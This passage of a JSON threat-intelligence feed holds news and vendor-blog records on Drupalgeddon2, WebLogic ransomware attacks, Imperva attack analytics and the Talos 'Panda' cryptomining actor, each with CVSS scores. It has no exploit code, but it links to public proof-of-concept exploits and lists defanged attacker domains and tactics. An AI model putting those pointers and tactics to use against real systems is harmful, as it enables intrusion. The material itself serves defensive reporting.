\n \nWe have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the \"backdoors or fix compromised sites.\" To fully resolve the issue you are recommended to follow this [Drupal guide](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-05T08:06:00", "type": "thn", "title": "Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T08:06:24", "id": "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "href": "https://thehackernews.com/2018/06/drupalgeddon2-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-5T7PpU6AWTk/WtG6Fi7QwCI/AAAAAAAAwOw/y5fEvJ9j7kM_-JbVZmCYg_FMATnvpYzmACLcBGAs/s728-e100/hacking-drupal-remote-code-execution-exploit-code.png>)\n\nHackers have started exploiting a recently disclosed critical vulnerability in Drupal shortly after the public release of 
working exploit code. \n \nTwo weeks ago, the Drupal security team [disclosed](<https://www.drupal.org/sa-core-2018-002>) a highly critical remote code execution vulnerability, dubbed **Drupalgeddon2**, in its content management system software that could allow attackers to completely take over vulnerable websites. \n \nTo address this vulnerability the project immediately released updated versions of Drupal CMS without publishing any technical details of the vulnerability, giving more than a million sites time to patch the issue. \n \nTwo days ago, security researchers at Check Point and Dofinity [published](<https://research.checkpoint.com/uncovering-drupalgeddon-2/>) complete technical details about this vulnerability (CVE-2018-7600), after which a Russian security researcher published proof-of-concept (PoC) [exploit code](<https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py>) for Drupalgeddon2 on GitHub. \n \nThe Drupalgeddon2 vulnerability, which affects all versions of Drupal from 6 to 8, allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations. \n\n\n[](<https://thehackernews.com/images/-qsxcL4GQ5_Y/WtG9rLLIcyI/AAAAAAAAwO8/acsBgkJ4gYYe5c5Vnk2t2l3f-S95bTrBgCLcBGAs/s728-e100/drupal-exploit.png>)\n\n \nAccording to Check Point's disclosure, the vulnerability exists due to insufficient sanitization of inputs passed via Form API (FAPI) AJAX requests. \n \n\n\n> \"As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication,\" Check Point researchers said. 
\n\n> \"By exploiting this vulnerability, an attacker would have been able to carry out a full site takeover of any Drupal customer.\"\n\n \nHowever, shortly after the public release of the PoC exploit, which many confirmed to be functional, researchers at [Sucuri](<https://twitter.com/danielcid/status/984555586644688898>), [Imperva](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>), and the [SANS](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) Internet Storm Center started seeing attempts to exploit Drupalgeddon2, though none have yet to see any reports of websites being hacked. \n \nSites administrators still running vulnerable versions of Drupal are highly recommended to patch the vulnerability by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible to avoid exploits. \n \nThe vulnerability also affects Drupal 6, which is no longer supported by the company since February 2016, but a patch for the version has still been created.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-14T08:29:00", "type": "thn", "title": "Hackers Have Started Exploiting Drupal RCE Exploit Released Yesterday", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-14T08:37:13", "id": "THN:B0F0C0035DAAFA1EC62F15464A80677E", "href": "https://thehackernews.com/2018/04/drupal-rce-exploit-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:39", "description": "[](<https://thehackernews.com/images/-rIYNaeU1bb8/XMlFNdFL9_I/AAAAAAAAz4g/ioP3l5goEXYV6kwJvqgQXuChrtVFbUYJwCLcBGAs/s728-e100/ransomware-oracle-weblogic.jpg>)\n\nTaking advantage of newly disclosed and even patched vulnerabilities has become common among cybercriminals, which makes it one of the primary attack vectors for everyday-threats, like crypto-mining, phishing, and ransomware. \n \nAs suspected, a recently-disclosed critical vulnerability in the widely used Oracle WebLogic Server has now been spotted actively being exploited to distribute a never-before-seen ransomware variant, which researchers dubbed \"**Sodinokibi**.\" \n \nLast weekend, The Hacker News learned about a critical deserialization remote code execution [vulnerability in Oracle WebLogic Server](<https://thehackernews.com/2019/04/oracle-weblogic-hacking.html>) that could allow attackers to remotely run arbitrary commands on the affected servers just by sending a specially crafted HTTP request\u2014without requiring any authorization. \n \nTo address this vulnerability (CVE-2019-2725), which affected all versions of the Oracle WebLogic software and was given a severity score of 9.8 out of 10, Oracle rolled out an out-of-band [security update](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>) on April 26, just a day after the vulnerability was made public and several in-the-wild attacks were observed. 
\n \nAccording to cybersecurity researchers from Cisco Talos' threat research team, an unknown group of hackers has been exploiting this vulnerability since at least April 25 to infect vulnerable servers with a new piece of ransomware. \n\n\n[](<https://thehackernews.com/images/-NyvdVA6dbaE/XMlHegXqUiI/AAAAAAAAz40/554Hulf2uwgF6Dk-2-fXKebGk63SdLVIgCLcBGAs/s728-e100/ransomware-oracle-weblogic.png>)\n\nSodinokibi is a dangerous ransomware variant designed to encrypt files in a user's directory and then delete shadow copy backups from the system, so that victims cannot recover their data without paying the ransom. \n \n\n\n## No Interaction Required to Deploy Ransomware\n\n \nBecause the attackers are leveraging a remote code execution vulnerability in WebLogic Server, deploying the Sodinokibi ransomware requires no user interaction, unlike a typical ransomware attack. \n \n\n\n> \"Historically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device,\" researchers explain in a [blog post](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>). \n \n\"In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses.\"\n\n \n \nOnce downloaded, the Sodinokibi ransomware encrypts the victim's systems and displays a ransom note demanding up to $2,500 in Bitcoin. The amount doubles to $5,000 if the ransom is not paid within a specified number of days\u2014which varies from two to six days. 
\n \n\n\n## Hackers Are Also Installing GandCrab Ransomware\n\n \nResearchers also noted that roughly eight hours after deploying Sodinokibi on an infected system, the attackers exploited the same WebLogic Server vulnerability to install another piece of ransomware known as [GandCrab](<https://thehackernews.com/2019/01/microsoft-gandcrab-ursnif.html>) (v5.2). \n\n\n[](<https://thehackernews.com/images/-MvaUSRB1IIk/XMlHYDSzrgI/AAAAAAAAz4o/bc94128mSTQz0yu0p92EhQ_ei9eWEiJkQCLcBGAs/s728-e100/ransomware-attack.png>)\n\n> \"We find it strange the attackers would choose to distribute additional, different ransomware on the same target,\" the researchers say. \"Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.\"\n\n \nAttackers have been exploiting the Oracle WebLogic Server vulnerability in the wild since at least April 17 to distribute [cryptocurrency miners](<https://isc.sans.edu/diary/Update+about+Weblogic+CVE-2019-2725+%28Exploits+Used+in+the+Wild%2C+Patch+Status%29/24890>) and other [types of malware](<https://devcentral.f5.com/articles/oracle-weblogic-deserialization-remote-code-execution-34185>). \n \nWebLogic Server is a popular Java-based multi-tier enterprise application server typically used by businesses to support enterprise apps, which makes it a frequent target of attackers looking to run cryptocurrency miners or deploy ransomware. 
\n \nOrganizations that use Oracle WebLogic Server should make sure to update their installations to the latest version of the software as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-01T07:23:00", "type": "thn", "title": "Hackers Found Exploiting Oracle WebLogic RCE Flaw to Spread Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-01T07:31:20", "id": "THN:C3BFE86E2BE38F28D9CEB17AD2C50EBD", "href": "https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-12-29T14:37:27", "description": "Ransomware may have dominated headlines in 2021, but it\u2019s only one of many threats security teams must protect against. We\u2019re taking a look back at 5 top cybersecurity stories of 2021 that practitioners wanted to learn more about.\n\n## [5\\. 
The State of Security in eCommerce](<https://www.imperva.com/blog/by-the-numbers-the-state-of-security-in-ecommerce/>)\n\n### Why you should learn more about this\n\nThe global pandemic has pushed more consumers online and forced the acceleration of growth in eCommerce. The threat landscape for eCommerce websites has never been larger or more complex, with bad bot traffic being the principal problem, accounting for 57% of all attacks on online retail websites in 2021. In addition to stopping ordinary eCommerce transactions, about a third of attacks on web applications on retail websites resulted in data leakage. And with 83% of retail websites running third-party JavaScript-based services executing on the client-side, application developers are creating blind spots in securing the services they need to protect.\n\n### What can eCommerce enterprises do?\n\nIn addition to [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>), security practitioners may also consider [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) that provides visibility into JavaScript services executing on a website at any given moment. This solution automatically scans for existing and newly added services, eliminating the risk of them being a blind spot for security. Client-Side Protection enables you to allow approved domains while blocking unapproved ones and ensures your customers\u2019 sensitive information doesn\u2019t end up being transferred to unauthorized locations and that no fraudsters are exploiting your visitors.\n\n## [4\\. How Imperva Is Protecting Customers & Staying Ahead of CVE-2021-44228](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>)\n\n### Why you should learn more about this\n\nCVE-2021-44228 allows for unauthenticated remote code execution and is having a big impact on all organizations running Java workloads. 
Security teams are scrambling to immediately patch their software and upgrade third-party components to meet SLAs. Initial attack peaks reached roughly 280K/hour and as with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.\n\n### What can security practitioners do?\n\n[Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a defense-in-depth strategy for enterprises to protect their applications and APIs on a broad front. Many Imperva customers that have deployed RASP have saved thousands of hours in emergency patching and made their secure software development lifecycle faster. Customers that have RASP deployed across their Java applications are protected from RCEs related to CVE-2021-44228.\n\n## [3\\. The ad blocker that injects ads](<https://www.imperva.com/blog/the-ad-blocker-that-injects-ads/>)\n\n### Why you should learn more about this\n\nAd injection is the process of inserting unauthorized advertisements into a publisher\u2019s web page with the intention of enticing the user to click on them. Ad injectors are often made by scammers trying to make money from application downloads. They can generate revenue for their creators by serving ads and stealing advertising impressions from other websites. With many people spending more time browsing the web, deceptive ad injection is a growing concern. Attackers are constantly refining their tactics, techniques, and procedures.\n\n### What can security practitioners do?\n\nMalicious JavaScript files, including ad injection scripts, are still widespread on the Internet despite worldwide efforts among security practitioners to make the web safer. Imperva [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) enables customers to block such malicious JavaScript threats. 
The solution provides security teams with visibility and insights into the JavaScript-based services running on their websites, as well as the ability to block unwanted services from executing.\n\n## [2\. Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>)\n\n### Why you should learn more about this\n\nRemote Code Execution (RCE) vulnerabilities allow threat actors to monetize affected systems easily by installing cryptocurrency miners and masking their activity, abusing the processing resources of the target.\n\n### What can security practitioners do?\n\nWith [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>), security practitioners can see a CVE's activity in Imperva Attack Analytics. Also, given the nature of how [Imperva Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs can be stopped without requiring any code changes or policy updates. Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected when RASP is actively deployed.\n\n## [1\. 5 elements to include in a cybersecurity strategy for any size business](<https://www.imperva.com/blog/5-elements-to-include-in-a-cybersecurity-strategy-for-any-size-business/>)\n\n### Why you should learn more about this\n\nCybercriminals don\u2019t care how big your business is. If there is a way to separate you from your data or put a wrench in the works of your web applications by launching an automated attack, they will figure out a way to do that. If not directly through your site, then through the software supply chain or through your website visitors. 
Today, you shouldn\u2019t depend on your developers to build water-tight web application code, your ISP to protect you from a DDoS attack, or your compliance audit checkbox to protect you from a data breach. The threat landscape has progressed far beyond these notions.\n\n### What can security practitioners do?\n\nWe strongly recommend working with [cybersecurity experts](<https://www.imperva.com/contact-us/>) to accurately evaluate your specific threat landscape and help you build a sustainable data security strategy for today and the future.\n\nThe post [2021 in Review, Part 2: 5 Top Cybersecurity Stories](<https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T12:03:19", "type": "impervablog", "title": "2021 in Review, Part 2: 5 Top Cybersecurity Stories", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-29T12:03:19", "id": "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "href": 
"https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-27T04:45:34", "description": "Ever since March 28th, when Drupal published a patch for a RCE named Drupalgeddon 2.0 (SA-CORE-2018-002/[CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)), Imperva has been monitoring our cloud looking for hackers\u2019 attempts to exploit the vulnerability, but found nothing. Until today.\n\nIt somehow seems fitting that nefarious activity picked up today, Friday the 13th. After a [POC exploit](<https://research.checkpoint.com/uncovering-drupalgeddon-2/>) was released, our monitoring services showed that hackers are finally starting to catch up! Since the RCE exploit was publicly disclosed two weeks ago, they could have been working on their own exploits, but didn\u2019t.\n\n## Lazy Hackers\n\nAs usual when exploits become known, we go into hyper-awareness mode looking for security events (and of course, protecting our customers), but no events were identified. Not a single attack. We rang to some of our teammates looking for answers, asking if they deleted events, but no\u2014it\u2019s just simply that no one attempted to exploit this newfound bug and it took them two whole weeks to reverse the patch.\n\nIt appeared every one of the black hats was waiting for someone else to do the research and share the exploit. Perhaps most hackers don\u2019t care for the actual work of finding ways to exploit a vulnerability. They just wait until something is public and then use it to attack. 
Before that, we saw almost no traffic whatsoever!\n\n## Attack Data\n\nThe chart below is just the beginning of the numbers we\u2019re now seeing in our cloud, and they are continuing to rise (Figure 1).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-date.png>)\n\n_Figure 1: Attacks by date_\n\nSo far, 90% of the attack attempts we have seen are scanners, 3% are backdoor infection attempts, and 2% are attempts to run crypto miners on the targets (Figure 2).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-distribution-type.png>)\n\n_Figure 2: Attacks by distribution type_\n\nAlso, most of the attacks originated from the US (53%) and China (45%) (Figure 3).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-geo.png>)\n\n_Figure 3: Location source of attacks_\n\n## Imperva Customers Protected\n\nWe applied a virtual patch to Imperva SecureSphere and Incapsula WAF customers within hours of identifying the RCE vulnerability.\n\nIn addition to our zero-day protection rules that spotted this attack, we also published a new dedicated security rule to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T19:13:25", "type": "impervablog", "title": "Drupalgeddon 2.0: Are Hackers Slacking Off?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T19:13:25", "id": "IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "href": "https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-13T21:29:37", "description": "\n\nAttacks on applications can be divided into two types: targeted attacks and \u201cspray and pray\u201d attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization\u2019s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or [sold on the dark web](<https://medium.com/beyond-the-perimeter/over-750-000-debit-and-credit-cards-for-sale-found-on-the-deep-web-434e050ac59f>). Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack. \n\nOne famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. 
Tools exploiting this weakness became [widely available](<https://github.com/dreadlocked/Drupalgeddon2>), which caused the [number of attacks on Drupal sites to explode](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>).\n\nThe ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, or identify a sniffing attack that could be a precursor to a more serious targeted one.\n\n**Identifying Spray and Pray Attacks in Attack Analytics**\n\n[Attack Analytics](<https://www.imperva.com/products/attack-analytics/>), launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigable incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.\n\nWe recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below. \n\n_Figure 1: Attack Analytics Dashboard_\n\nClicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). 
An alternative way to get the list of spray and pray incidents potentially affecting the user is to log in to the console and use the \u201cHow common\u201d filter.\n\n_Figure 2: Attack Analytics Many Customers Filter_\n\n \n\nA closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).\n\n_Figure 3: Attack Analytics Incident Insights_\n\n**How Our Algorithm Works**\n\nThe algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When similar incidents occur across a large number of customers within a short time window, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge and is based on a combination of factors, such as:\n\n * The attack source: Network source (IP/Subnet), Geographic location\n * The attack target: URL, Host, Parameters\n * The attack time: Duration, Frequency\n * The attack type: Triggered rule\n * The attack tool: Tool name, type & parameters \n\nIn some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. In a distributed attack, the origin is not useful, but the other factors still are. In many cases, a spray and pray attack will be aimed at the same group of URLs.\n\nAnother significant common factor is the attack type, in particular a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes the same tools are observed, or the tools belong to the same type of attack. The time element is also key, especially the duration of the attack or its frequency.\n\n**Results and Findings**\n\nThe Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties the incidents together. 
When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with a single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) is attacked.\n\n_Figure 4: Spray & Pray Incidents Spread_\n\nHere\u2019s an interesting example: a spray and pray attack from a single IP that attacked 1,368 customers over the same 3 consecutive days with the same vulnerability scanner, LTX71. We\u2019ve also seen Bad Bots illegally accessing resources, attacking from the same subnet located in Illinois using a Trustwave vulnerability scanner. These bots performed a URL scan on our customers\u2019 resources, an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files on more than 50 different customers with [cURL](<https://www.hackingarticles.in/web-application-penetration-testing-curl/>). And the list goes on.\n\nFocusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers. \n\n_Figure 5: Single Source Spray & Pray Accounts Affected_\n\n**More Actionable Insights Coming**\n\nIdentifying spray and pray attacks is a great example of using the intelligence from Imperva\u2019s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. 
Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future. \n\nThe post [How Imperva's New Attack Crowdsourcing Secures Your Business's Applications](<https://www.imperva.com/blog/how-impervas-new-attack-crowdsourcing-secures-your-businesss-applications/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-02-13T12:52:46", "type": "impervablog", "title": "How Imperva\u2019s New Attack Crowdsourcing Secures Your Business\u2019s Applications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-02-13T12:52:46", "id": "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "href": "https://www.imperva.com/blog/how-impervas-new-attack-crowdsourcing-secures-your-businesss-applications/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talosblog": [{"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) 
and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it has still been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs mean that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromise and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, and IT services industries were affected in these campaigns. 
\n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used masscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an 